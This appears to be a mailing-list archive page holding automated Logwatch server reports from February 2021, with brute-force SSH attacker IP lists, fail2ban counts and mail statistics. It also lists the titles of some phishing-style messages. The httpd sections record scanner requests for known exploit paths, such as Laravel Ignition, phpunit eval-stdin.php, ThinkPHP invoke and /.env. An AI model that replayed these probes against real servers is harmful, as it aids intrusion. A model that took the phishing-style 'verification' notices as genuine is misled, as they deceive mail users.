159.65.142.192: 57 times 159.65.245.182 (route.datahinge.com): 47 times 159.89.132.200: 1 time 159.89.197.1: 57 times 160.153.235.106 (ip-160-153-235-106.ip.secureserver.net): 1 time 161.35.17.214: 1 time 161.35.47.220: 66 times 163.172.60.154 (cutslimier.com): 2 times 167.86.90.235 (vmi527840.contaboserver.net): 64 times 167.250.48.115: 54 times 168.138.230.95: 52 times 170.254.226.157 (157.226.254.170.ciotec.com.br): 48 times 175.176.37.136: 56 times 176.31.69.146 (ip146.ip-176-31-69.eu): 58 times 177.134.162.152 (177.134.162.152.dynamic.adsl.gvt.net.br): 69 times 178.128.88.244: 55 times 178.128.127.126: 18 times 178.128.221.85: 1 time 180.166.114.14: 1 time 180.250.97.19: 1 time 181.63.248.149 (static-ip-cr18163248149.cable.net.co): 39 times 181.123.13.77 (pool-77-13-123-181.telecel.com.py): 1 time 182.61.19.134: 40 times 182.254.151.198: 49 times 182.254.168.205: 62 times 183.129.163.142: 47 times 185.36.81.52 (sterharvest.com): 1 time 187.72.223.203 (187-072-223-203.static.ctbctelecom.com.br): 57 times 190.145.123.26: 14 times 190.226.244.9 (host9.190-226-244.telecom.net.ar): 50 times 192.241.202.169: 62 times 192.241.209.46: 9 times 195.70.60.100: 60 times 195.97.75.174: 64 times 199.19.76.101 (76-19-199.unassigned.userdns.com): 64 times 200.29.109.193 (dsl-emcali-200.29.109.193.emcali.net.co): 36 times 201.72.190.101: 10 times 201.149.49.146 (146.49.149.201.in-addr.arpa): 31 times 201.149.49.162 (162.49.149.201.in-addr.arpa): 26 times 202.28.221.106: 1 time 202.51.74.123 (mail.subendramaharjan.com.np): 1 time 206.189.194.249: 35 times 209.141.45.21: 6 times 210.56.23.100 (discozdata.org): 47 times 218.92.0.133: 66 times 218.92.0.138: 42 times 218.92.0.145: 18 times 218.92.0.157: 5 times 218.92.0.165: 17 times 218.92.0.171: 24 times 218.92.0.184: 54 times 218.92.0.185: 42 times 218.92.0.247: 42 times 221.181.185.140: 18 times 221.181.185.143: 24 times 221.181.185.237: 60 times 222.73.62.184: 63 times 222.187.238.87: 6 times 222.187.239.31: 24 times 222.206.231.192: 4 times Illegal users from: undef: 81 times 41.204.7.74: 1 time 45.93.201.193: 3 times 65.49.20.67 (scan-18.shadowserver.org): 1 time 81.214.63.228 (81.214.63.228.dynamic.ttnet.com.tr): 1 time 86.94.73.194 (86-94-73-194.fixed.kpn.net): 2 times 91.173.12.250 (91-173-12-250.subs.proxad.net): 2 times 106.70.8.107 (n106-70-8-107.rdl1.qld.optusnet.com.au): 2 times 117.173.67.119: 11 times 141.98.80.29: 2 times 141.98.80.89: 1 time 141.98.80.90: 2 times 141.98.80.91: 1 time 141.98.80.92: 1 time 141.98.80.93: 2 times 167.86.90.235 (vmi527840.contaboserver.net): 64 times 175.176.160.62 (host.176.160.62.varnion.com): 3 times 178.73.215.171 (178-73-215-171-static.glesys.net): 1 time 185.36.81.52 (sterharvest.com): 3 times 185.220.102.243 (185-220-102-243.torservers.net): 2 times 205.185.125.54: 14 times 218.23.156.227: 1 time ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop47755p1 394G 242G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################

4 Jahre, 7 Monate

1
0
0 / 0

MAIL DEATIVATION REQUEST

by Email Admin

4 Jahre, 7 Monate

1
0
0 / 0

✉ STORAGE WARNING: Your Email "topf@zapf.in" is almost full.

by Customer Support Team

4 Jahre, 7 Monate

1
0
0 / 0

Logwatch for h2361197.stratoserver.net (Linux)

by root＠zapf.in

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Fri Feb 26 04:42:09 2021 Date Range Processed: yesterday ( 2021-Feb-25 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [117:117] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ A total of 5 sites probed the server 103.145.13.118 115.50.228.155 138.197.141.156 185.153.197.179 61.219.11.153 Requests with error response codes 400 Bad Request null: 12 Time(s) /: 4 Time(s) /0bef: 1 Time(s) /_ignition/execute-solution: 1 Time(s) /ab2g: 1 Time(s) /ab2h: 1 Time(s) 403 Forbidden /resolutionen/sose17/gesellschaftlich_verantwortung/: 1 Time(s) 404 Not Found /robots.txt: 25 Time(s) /wp-login.php: 3 Time(s) /protokolle/Protokoll_MV_12.11.2016.pdf: 2 Time(s) /protokolle/Protokoll_MV_2020_11_12_Muenchen.pdf: 2 Time(s) /berlin/apple-touch-icon.png: 1 Time(s) /reader/2017_SoSe_Berlin_vorlaeufig.pdf: 1 Time(s) /reader/tu-dresden.de/tu-dresden/gesundhei ... e_final-TUD.pdf: 1 Time(s) /reader/tu-dresden.de/tu-dresden/gesundhei ... istungen_DE.pdf: 1 Time(s) /reader/www.bundesrat.de/SharedDocs/drucks ... 0/216-19(B).pdf: 1 Time(s) /sites/default/files/2006_SoSe_Dresden.pdf: 1 Time(s) /sites/default/files/Empfehlungen_der_ZaPF ... 7CStellungnahme: 1 Time(s) 500 Internal Server Error /: 36 Time(s) /sitemap.txt: 5 Time(s) /robots.txt: 4 Time(s) /atom.xml: 3 Time(s) /sitemap_index.xml: 3 Time(s) /.env: 2 Time(s) /_ignition/execute-solution: 2 Time(s) /sitemap.xml: 2 Time(s) /sitemap.xml.gz: 2 Time(s) /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s) /?XDEBUG_SESSION_START=phpstorm: 1 Time(s) /Autodiscover/Autodiscover.xml: 1 Time(s) /admin//config.php: 1 Time(s) /api/jsonws/invoke: 1 Time(s) /console/: 1 Time(s) /index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s) /mifs/.;/services/LogService: 1 Time(s) /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s) /wp-content/plugins/wp-file-manager/readme.txt: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (61.177.172.104): 121 Time(s) root (218.92.0.133): 71 Time(s) root (180.76.111.55): 68 Time(s) root (152.136.184.12): 67 Time(s) root (rs000279.fastrootserver.de): 67 Time(s) root (36.67.197.52): 66 Time(s) root (52.147.154.104.bc.googleusercontent.com): 66 Time(s) root (3.ip-51-91-76.eu): 64 Time(s) root (157.230.3.204): 62 Time(s) root (81.70.193.181): 61 Time(s) root (251.223.80.34.bc.googleusercontent.com): 60 Time(s) root (124.156.139.91): 59 Time(s) root (144.126.197.136): 59 Time(s) root (218.92.0.184): 59 Time(s) root (88.ip-144-217-15.net): 59 Time(s) root (81.30.162.28): 58 Time(s) root (129.226.55.85): 57 Time(s) root (178.128.223.85): 56 Time(s) root (ool-44c04a05.dyn.optonline.net): 56 Time(s) root (128.199.213.194): 55 Time(s) root (174.138.20.105): 55 Time(s) root (182.254.151.2): 55 Time(s) root (167.172.133.221): 54 Time(s) root (180.166.114.14): 54 Time(s) root (42.193.181.249): 54 Time(s) root (195.214.223.84): 53 Time(s) root (114.67.90.104): 52 Time(s) root (157.230.33.158): 52 Time(s) root (34.176.226.35.bc.googleusercontent.com): 52 Time(s) root (118.89.245.92): 51 Time(s) root (vps-58038cba.vps.ovh.net): 51 Time(s) root (106.12.46.26): 50 Time(s) root (115.85.53.91): 50 Time(s) root (43.226.69.100): 48 Time(s) root (124.236.22.12): 46 Time(s) root (139.198.1.16): 46 Time(s) root (189.6.30.178): 45 Time(s) root (192.241.209.46): 45 Time(s) root (59.57.83.94): 45 Time(s) root (68.183.92.52): 44 Time(s) root (106.75.230.121): 43 Time(s) root (182.61.34.200): 43 Time(s) root (180.167.207.234): 42 Time(s) root (163.172.60.154): 41 Time(s) root (192.144.230.43): 41 Time(s) root (218.92.0.247): 41 Time(s) root (218.92.0.185): 36 Time(s) root (140.143.243.27): 34 Time(s) root (218.92.0.165): 30 Time(s) root (218.92.0.248): 29 Time(s) root (46.101.54.195): 29 Time(s) root (150.136.21.3): 28 Time(s) root (221.181.185.140): 28 Time(s) root (smtp2.visto-web.com.br): 28 Time(s) root (218.92.0.171): 25 Time(s) root (85.ip-151-80-146.eu): 24 Time(s) root (152.32.228.7): 23 Time(s) root (fat85.internetdsl.tpnet.pl): 23 Time(s) root (178.154.228.6): 22 Time(s) root (111.230.204.113): 19 Time(s) root (168.227.99.11): 18 Time(s) root (218.92.0.138): 18 Time(s) root (222.187.239.31): 18 Time(s) root (218.92.0.145): 16 Time(s) root (195.43.3.231): 15 Time(s) root (95.85.34.53): 15 Time(s) root (221.181.185.143): 14 Time(s) root (222.187.238.87): 14 Time(s) root (221.181.185.237): 12 Time(s) root (vmi527840.contaboserver.net): 12 Time(s) unknown (190.216.87.162): 12 Time(s) root (178.154.253.235): 11 Time(s) root (203.46.223.176): 6 Time(s) unknown (subs03-180-214-233-22.three.co.id): 6 Time(s) root (104.131.190.193): 4 Time(s) root (114.80.157.205): 4 Time(s) root (134.122.19.213): 4 Time(s) root (mx1.eitd.gov.kh): 4 Time(s) unknown (115.178.223.75): 4 Time(s) unknown (221.0.94.20): 4 Time(s) root (194.6.233.138): 3 Time(s) unknown (195.54.160.250): 3 Time(s) unknown (mail.bluesloth.hu): 3 Time(s) unknown (v118-27-4-225.o4kn.static.cnode.io): 3 Time(s) root (134.122.69.50): 2 Time(s) root (190.216.87.162): 2 Time(s) root (81.161.63.101): 2 Time(s) root (smtp.algonews.space): 2 Time(s) unknown (129.red-83-38-230.dynamicip.rima-tde.net): 2 Time(s) unknown (206.189.2.121): 2 Time(s) unknown (220.193.11.109.rev.sfr.net): 2 Time(s) unknown (37.57.89.52): 2 Time(s) unknown (45.93.201.193): 2 Time(s) unknown (ip-89-176-18-137.net.upcbroadband.cz): 2 Time(s) unknown (wiebe.tor-exit.calyxinstitute.org): 2 Time(s) root (101.33.118.38): 1 Time(s) root (106.13.115.229): 1 Time(s) root (117.173.67.119): 1 Time(s) root (119.28.68.78): 1 Time(s) root (121.4.47.140): 1 Time(s) root (123.58.5.36): 1 Time(s) root (123.6.5.104): 1 Time(s) root (128.199.167.161): 1 Time(s) root (134.122.126.36): 1 Time(s) root (138.68.81.162): 1 Time(s) root (153.ip-51-75-140.eu): 1 Time(s) root (161.35.26.90): 1 Time(s) root (182.254.161.98): 1 Time(s) root (182.61.40.227): 1 Time(s) root (182.61.43.196): 1 Time(s) root (189.150.232.37): 1 Time(s) root (189.54.45.74): 1 Time(s) root (190.104.254.198): 1 Time(s) root (195.239.243.84): 1 Time(s) root (203.195.150.131): 1 Time(s) root (218.150.216.229): 1 Time(s) root (221.122.119.50): 1 Time(s) root (234.164.213.35.bc.googleusercontent.com): 1 Time(s) root (46.ip-51-91-159.eu): 1 Time(s) root (64.202.187.246): 1 Time(s) root (81.70.204.31): 1 Time(s) root (host-186-4-136-153.netlife.ec): 1 Time(s) root (msk-ns.noc.dozortel.ru): 1 Time(s) root (static-200-105-212-35.acelerate.net): 1 Time(s) root (v118-27-4-225.o4kn.static.cnode.io): 1 Time(s) root (vps-5f6227ee.vps.ovh.net): 1 Time(s) sshd (45.93.201.193): 1 Time(s) sync (213.197.157.206): 1 Time(s) unknown (190.152.4.202): 1 Time(s) Invalid Users: Unknown Account: 50 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 42 Miscellaneous warnings 18.724K Bytes accepted 19,173 18.724K Bytes sent via SMTP 19,173 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 1 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 1 Total 4xx Rejects 100.00% ======== ================================================== 1240 Connections 1184 Connections lost (inbound) 1240 Disconnections 1 Removed from queue 1 Sent via SMTP 1 Timeouts (inbound) 1 SMTP dialog errors 2 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Disconnecting after too many authentication failures for user: root : 74 Time(s) Failed logins from: 34.80.223.251 (251.223.80.34.bc.googleusercontent.com): 60 times 35.213.164.234 (234.164.213.35.bc.googleusercontent.com): 1 time 35.226.176.34 (34.176.226.35.bc.googleusercontent.com): 52 times 36.67.197.52: 66 times 42.193.181.249: 54 times 43.226.69.100: 48 times 45.93.201.193: 1 time 46.101.54.195: 29 times 51.68.172.217 (vps-5f6227ee.vps.ovh.net): 1 time 51.75.140.153 (153.ip-51-75-140.eu): 1 time 51.83.132.153 (vps-58038cba.vps.ovh.net): 51 times 51.91.76.3 (3.ip-51-91-76.eu): 64 times 51.91.159.46 (46.ip-51-91-159.eu): 1 time 59.57.83.94: 45 times 61.177.172.104: 121 times 64.202.187.246 (ip-64-202-187-246.secureserver.net): 1 time 68.183.92.52 (shadow.fail): 44 times 68.192.74.5 (ool-44c04a05.dyn.optonline.net): 56 times 81.30.162.28 (dial-up05.vsau.org): 58 times 81.70.193.181: 61 times 81.70.204.31: 1 time 81.161.63.101: 2 times 83.13.19.85 (fat85.internetdsl.tpnet.pl): 23 times 89.163.209.26 (rs000279.fastrootserver.de): 67 times 91.102.200.88 (msk-ns.noc.dozortel.ru): 1 time 95.85.34.53: 15 times 101.33.118.38: 1 time 103.134.177.163 (mx1.eitd.gov.kh): 4 times 104.131.190.193 (docman.gozmart.ch-prob): 4 times 104.154.147.52 (52.147.154.104.bc.googleusercontent.com): 66 times 106.12.46.26: 50 times 106.13.115.229: 1 time 106.75.230.121: 43 times 111.230.204.113: 19 times 114.67.90.104: 52 times 114.80.157.205: 4 times 115.85.53.91 (91.53.85.115.dsl.service.static.eastern-tele.com): 50 times 117.173.67.119: 1 time 118.27.4.225 (v118-27-4-225.o4kn.static.cnode.io): 1 time 118.89.245.92: 51 times 119.28.68.78: 1 time 121.4.47.140: 1 time 123.6.5.104 (hn.kd.ny.adsl): 1 time 123.58.5.36: 1 time 124.156.139.91: 59 times 124.236.22.12 (12.22.236.124.broad.sj.he.dynamic.163data.com.cn): 46 times 128.199.167.161: 1 time 128.199.213.194: 55 times 129.226.55.85: 57 times 134.122.19.213 (dev.pana.mirror): 4 times 134.122.69.50: 2 times 134.122.126.36: 1 time 138.68.81.162: 1 time 139.198.1.16: 46 times 140.143.243.27: 34 times 144.126.197.136: 59 times 144.217.15.88 (88.ip-144-217-15.net): 59 times 150.136.21.3: 28 times 151.80.146.85 (85.ip-151-80-146.eu): 24 times 152.32.228.7: 23 times 152.136.184.12: 67 times 157.230.3.204: 62 times 157.230.33.158: 52 times 161.35.26.90: 1 time 163.172.60.154 (cutslimier.com): 41 times 165.227.119.220 (smtp.algonews.space): 2 times 167.86.90.235 (vmi527840.contaboserver.net): 12 times 167.172.133.221: 54 times 168.227.99.11 (168-227-99-11.ptr.westnet.com.ar): 18 times 174.138.20.105: 55 times 177.69.119.161 (smtp2.visto-web.com.br): 28 times 178.128.223.85: 56 times 178.154.228.6: 22 times 178.154.253.235: 11 times 180.76.111.55: 68 times 180.166.114.14: 54 times 180.167.207.234: 42 times 182.61.34.200: 43 times 182.61.40.227: 1 time 182.61.43.196: 1 time 182.254.151.2: 55 times 182.254.161.98: 1 time 186.4.136.153 (host-186-4-136-153.netlife.ec): 1 time 189.6.30.178 (bd061eb2.virtua.com.br): 45 times 189.54.45.74 (bd362d4a.virtua.com.br): 1 time 189.150.232.37 (dsl-189-150-232-37-dyn.prod-infinitum.com.mx): 1 time 190.104.254.198 (static.198.254.104.190.cps.com.ar): 1 time 190.216.87.162: 2 times 192.144.230.43: 41 times 192.241.209.46: 45 times 194.6.233.138: 3 times 195.43.3.231 (msr-pc04.msr.sci.eg): 15 times 195.214.223.84: 53 times 195.239.243.84: 1 time 200.105.212.35 (static-200-105-212-35.acelerate.net): 1 time 203.46.223.176: 6 times 203.195.150.131: 1 time 213.197.157.206: 1 time 218.92.0.133: 71 times 218.92.0.138: 18 times 218.92.0.145: 18 times 218.92.0.165: 30 times 218.92.0.171: 26 times 218.92.0.184: 59 times 218.92.0.185: 36 times 218.92.0.247: 41 times 218.92.0.248: 29 times 218.150.216.229: 1 time 221.122.119.50: 1 time 221.181.185.140: 30 times 221.181.185.143: 18 times 221.181.185.237: 12 times 222.187.238.87: 18 times 222.187.239.31: 18 times Illegal users from: undef: 18 times 37.57.89.52 (52.89.57.37.triolan.net): 2 times 45.93.201.193: 2 times 65.49.20.67 (scan-18.shadowserver.org): 1 time 83.38.230.129 (129.red-83-38-230.dynamicip.rima-tde.net): 2 times 89.176.18.137 (ip-89-176-18-137.net.upcbroadband.cz): 2 times 109.11.193.220 (220.193.11.109.rev.sfr.net): 2 times 115.178.223.75: 5 times 118.27.4.225 (v118-27-4-225.o4kn.static.cnode.io): 3 times 139.162.122.110 (scan-8.security.ipip.net): 1 time 162.247.74.74 (wiebe.tor-exit.calyxinstitute.org): 2 times 180.214.233.22 (subs03-180-214-233-22.three.co.id): 6 times 190.152.4.202 (202.4.152.190.static.anycast.cnt-grms.ec): 1 time 190.216.87.162: 14 times 195.54.160.250: 3 times 206.189.2.121: 2 times 213.136.82.119 (mail.bluesloth.hu): 3 times 221.0.94.20: 4 times ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop47755p1 394G 242G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################

4 Jahre, 7 Monate

1
0
0 / 0

MAIL VERIFICATION-ACTION REQUIRED...!!!

by Mail Team Support

4 Jahre, 7 Monate

1
0
0 / 0

MAIL VERIFICATION-ACTION REQUIRED...!!!

by Mail Team Support

4 Jahre, 7 Monate

1
0
0 / 0

Logwatch for h2361197.stratoserver.net (Linux)

by root＠zapf.in

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Thu Feb 25 04:42:04 2021 Date Range Processed: yesterday ( 2021-Feb-24 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [ 96:96 ] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ A total of 9 sites probed the server 138.68.19.202 159.65.206.162 161.35.236.158 172.104.242.173 20.80.88.123 45.153.203.125 61.219.11.153 64.227.99.233 66.240.205.34 Requests with error response codes 400 Bad Request null: 12 Time(s) /: 5 Time(s) mstshash=Administr: 2 Time(s) /c/version.js: 1 Time(s) /client_area/: 1 Time(s) /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 1 Time(s) /stalker_portal/c/: 1 Time(s) /stalker_portal/c/version.js: 1 Time(s) /streaming/clients_live.php: 1 Time(s) /system_api.php: 1 Time(s) X\xD4>\x12\x98\xC4<\xE0\x13\xCF\x00\xAC\xA ... 5Cs\x9C\xBD\xCB: 1 Time(s) \x14+\x1A\x22\xB8\x887\x17\x057;\x00\x00\x ... x09\xC0\x14\xC0: 1 Time(s) 404 Not Found /robots.txt: 68 Time(s) /reader/1989-wi-berlin.pdf: 3 Time(s) /reader/1995-so-reader_ha95.pdf: 3 Time(s) /download/zapfev_satzung.pdf: 2 Time(s) /reader/1995-wi-reader_bn95.pdf: 2 Time(s) /resolutionen/sose17/gesellschaftlich_vera ... wantwortung.pdf: 2 Time(s) /wp-login.php: 2 Time(s) /berichte/WiSe14/Bericht_WiSe14-Bremen.pdf: 1 Time(s) /bupload/: 1 Time(s) /ebak/: 1 Time(s) /ebak1/: 1 Time(s) /ebak2/: 1 Time(s) /empirebak/: 1 Time(s) /eupload/: 1 Time(s) /protokolle/Protokoll_MV_2019_01_11_Freiburg.pdf: 1 Time(s) 499 (undefined) /: 1 Time(s) 500 Internal Server Error /: 66 Time(s) /.env: 7 Time(s) /robots.txt: 7 Time(s) /sitemap.xml: 6 Time(s) /atom.xml: 5 Time(s) /sitemap.txt: 5 Time(s) /sitemap_index.xml: 4 Time(s) /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s) //login_sid.lua: 1 Time(s) /?XDEBUG_SESSION_START=phpstorm: 1 Time(s) /Autodiscover/Autodiscover.xml: 1 Time(s) /_ignition/execute-solution: 1 Time(s) /admin//config.php: 1 Time(s) /api/jsonws/invoke: 1 Time(s) /c/version.js: 1 Time(s) /client_area/: 1 Time(s) /console/: 1 Time(s) /index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s) /mifs/.;/services/LogService: 1 Time(s) /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s) /sitemap.xml.gz: 1 Time(s) /stalker_portal/c/: 1 Time(s) /stalker_portal/c/version.js: 1 Time(s) /streaming/clients_live.php: 1 Time(s) /system_api.php: 1 Time(s) /wp-content/plugins/wp-file-manager/readme.txt: 1 Time(s) 503 Service Unavailable /me: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (vmi501273.contaboserver.net): 228 Time(s) root (165.227.165.102): 92 Time(s) root (248.ip-149-56-130.net): 83 Time(s) root (150.136.21.3): 72 Time(s) root (114.67.105.113): 70 Time(s) root (42.248.78.56): 69 Time(s) root (120.48.31.123): 68 Time(s) root (159.203.181.218): 66 Time(s) root (139.215.217.181): 65 Time(s) root (206.189.122.104): 65 Time(s) root (157.230.215.145): 64 Time(s) root (119.28.194.66): 63 Time(s) root (139.59.3.114): 62 Time(s) root (194.152.206.47): 62 Time(s) root (106.13.217.124): 61 Time(s) root (176.235.221.83): 61 Time(s) root (42.192.87.213): 61 Time(s) root (114.67.95.121): 60 Time(s) root (188.254.0.172): 60 Time(s) root (209.141.35.155): 60 Time(s) root (36.22.178.114): 60 Time(s) root (188.131.135.227): 59 Time(s) root (v133-130-118-86.a049.g.tyo1.static.cnode.io): 59 Time(s) root (vps-03cdee8b.vps.ovh.net): 59 Time(s) root (216.ip-144-217-243.net): 58 Time(s) root (ip91.ip-149-56-80.net): 57 Time(s) root (104.248.144.65): 56 Time(s) root (139.59.72.206): 56 Time(s) root (210-71-232-236.hinet-ip.hinet.net): 56 Time(s) root (180.76.161.127): 55 Time(s) root (43.128.20.17): 55 Time(s) root (223.255.28.203): 54 Time(s) root (128.199.129.68): 53 Time(s) root (51.39.189.65): 53 Time(s) root (221.213.129.46): 52 Time(s) root (132.232.89.186): 51 Time(s) root (211.252.87.42): 51 Time(s) root (node-hwk.pool-182-52.dynamic.totinternet.net): 51 Time(s) root (45.59.116.101): 49 Time(s) root (106.75.15.152): 48 Time(s) root (203.195.141.177): 48 Time(s) root (161.35.49.78): 47 Time(s) root (104.236.124.45): 46 Time(s) root (179.127.167.201): 46 Time(s) root (58.19.42.140): 46 Time(s) root (103.123.25.80): 45 Time(s) root (203.46.223.176): 45 Time(s) root (218.30.91.130): 45 Time(s) root (c-73-232-46-104.hsd1.tx.comcast.net): 45 Time(s) root (119.29.183.138): 44 Time(s) root (49.233.16.90): 44 Time(s) root (182.254.150.136): 43 Time(s) root (157.230.33.158): 42 Time(s) root (smtp2.visto-web.com.br): 42 Time(s) root (118.89.235.217): 41 Time(s) root (119.45.242.37): 41 Time(s) root (212.64.3.194): 41 Time(s) root (172.81.239.224): 40 Time(s) root (191.255.210.82): 40 Time(s) root (95.85.28.125): 40 Time(s) root (fl1-210-147-152-88.kng.mesh.ad.jp): 40 Time(s) root (183.239.21.44): 39 Time(s) root (27.128.168.225): 39 Time(s) root (64.227.107.151): 39 Time(s) root (81.69.25.239): 39 Time(s) root (221.0.94.20): 37 Time(s) root (106.12.185.16): 36 Time(s) root (128.199.116.139): 36 Time(s) root (192.241.185.120): 36 Time(s) root (207.ip-51-255-203.eu): 36 Time(s) root (61.177.172.104): 36 Time(s) root (104.131.16.72): 35 Time(s) root (159.75.115.172): 35 Time(s) root (58.87.78.176): 35 Time(s) root (106.12.30.57): 33 Time(s) root (134.122.19.213): 33 Time(s) root (165.227.163.85): 33 Time(s) root (176.109.0.30): 33 Time(s) root (129.226.170.65): 32 Time(s) root (49.234.9.92): 32 Time(s) root (smtp.algonews.space): 32 Time(s) root (119.45.222.118): 31 Time(s) root (bl21-166-137.dsl.telepac.pt): 31 Time(s) root (62.234.114.64): 30 Time(s) root (111.230.204.113): 27 Time(s) root (221.231.125.146): 26 Time(s) root (104.128.92.120.16clouds.com): 25 Time(s) root (167.160.188.190): 25 Time(s) root (103.152.242.19): 24 Time(s) root (129.211.124.204): 22 Time(s) root (221.181.185.143): 22 Time(s) root (218.92.0.165): 18 Time(s) root (218.92.0.171): 18 Time(s) root (218.92.0.248): 18 Time(s) root (222.187.238.87): 18 Time(s) root (165.227.46.89): 16 Time(s) root (106.12.107.61): 15 Time(s) root (118.125.106.12): 15 Time(s) root (192.144.230.43): 13 Time(s) unknown (49.205.84.209): 13 Time(s) root (123.207.78.83): 10 Time(s) root (221.181.185.140): 10 Time(s) root (43.226.69.100): 10 Time(s) root (85.ip-151-80-146.eu): 10 Time(s) root (178.154.228.6): 9 Time(s) root (88.ip-144-217-15.net): 9 Time(s) root (195.43.3.231): 7 Time(s) unknown (221.0.94.20): 7 Time(s) root (138.94.192.131): 6 Time(s) root (218.92.0.133): 6 Time(s) root (218.92.0.138): 6 Time(s) root (218.92.0.184): 6 Time(s) root (104.131.190.193): 4 Time(s) root (159.89.202.95): 4 Time(s) unknown (c-73-15-44-227.hsd1.ca.comcast.net): 4 Time(s) unknown (206.189.2.121): 3 Time(s) root (81.161.63.101): 2 Time(s) root (81.161.63.253): 2 Time(s) unknown (141.98.80.69): 2 Time(s) unknown (141.98.80.71): 2 Time(s) unknown (141.98.80.82): 2 Time(s) unknown (141.98.80.85): 2 Time(s) unknown (195.54.160.250): 2 Time(s) unknown (77.69.205.18): 2 Time(s) unknown (ns555166.ip-54-39-16.net): 2 Time(s) mysql (195.54.160.250): 1 Time(s) root (104.248.13.213): 1 Time(s) root (106.241.33.158): 1 Time(s) root (114.7.124.134): 1 Time(s) root (117.50.45.241): 1 Time(s) root (124.156.133.54): 1 Time(s) root (124.205.84.8): 1 Time(s) root (134.209.155.240): 1 Time(s) root (138.68.40.92): 1 Time(s) root (139.129.108.135): 1 Time(s) root (14.143.3.30): 1 Time(s) root (141.98.80.70): 1 Time(s) root (141.98.80.83): 1 Time(s) root (157.230.55.192): 1 Time(s) root (181.49.118.185): 1 Time(s) root (192.144.254.35): 1 Time(s) root (202.61.133.80): 1 Time(s) root (218.95.182.38): 1 Time(s) root (222.239.124.19): 1 Time(s) root (223.113.4.34): 1 Time(s) root (41.76.175.131): 1 Time(s) root (42.192.75.240): 1 Time(s) root (42.194.132.178): 1 Time(s) root (46.101.143.148): 1 Time(s) root (49.232.193.113): 1 Time(s) root (58.59.17.74): 1 Time(s) root (60.168.81.236): 1 Time(s) root (81.68.171.183): 1 Time(s) root (ns319899.ip-91-121-86.eu): 1 Time(s) unknown (178.253.237.18): 1 Time(s) unknown (200.216.31.20): 1 Time(s) Invalid Users: Unknown Account: 43 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 15 Miscellaneous warnings 19.074K Bytes accepted 19,532 19.074K Bytes sent via SMTP 19,532 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 1 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 1 Total 4xx Rejects 100.00% ======== ================================================== 71 Connections 12 Connections lost (inbound) 71 Disconnections 1 Removed from queue 1 Sent via SMTP 2 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Disconnecting after too many authentication failures for user: root : 19 Time(s) Failed logins from: 2.82.166.137 (bl21-166-137.dsl.telepac.pt): 31 times 14.143.3.30 (14.143.3.30.static-Bangalore.vsnl.net.in): 1 time 27.128.168.225: 39 times 36.22.178.114: 60 times 41.76.175.131: 1 time 42.192.75.240: 1 time 42.192.87.213: 61 times 42.194.132.178: 1 time 42.248.78.56: 69 times 43.128.20.17: 55 times 43.226.69.100: 10 times 45.59.116.101: 49 times 46.101.143.148: 1 time 49.232.193.113: 1 time 49.233.16.90: 44 times 49.234.9.92: 32 times 51.39.189.65: 53 times 51.83.131.123 (vps-03cdee8b.vps.ovh.net): 59 times 51.255.203.207 (207.ip-51-255-203.eu): 36 times 58.19.42.140: 46 times 58.59.17.74: 1 time 58.87.78.176: 35 times 60.168.81.236: 1 time 61.177.172.104: 36 times 62.234.114.64: 30 times 64.227.107.151: 39 times 73.232.46.104 (c-73-232-46-104.hsd1.tx.comcast.net): 45 times 81.68.171.183: 1 time 81.69.25.239: 39 times 81.161.63.101: 2 times 81.161.63.253: 2 times 91.121.86.22 (ns319899.ip-91-121-86.eu): 1 time 95.85.28.125: 40 times 103.123.25.80 (host-103-123-25-80.pky.kalteng.go.id): 45 times 103.152.242.19: 24 times 104.128.92.120 (104.128.92.120.16clouds.com): 25 times 104.131.16.72 (advancesettlers.netssl): 35 times 104.131.190.193 (docman.gozmart.ch-prob): 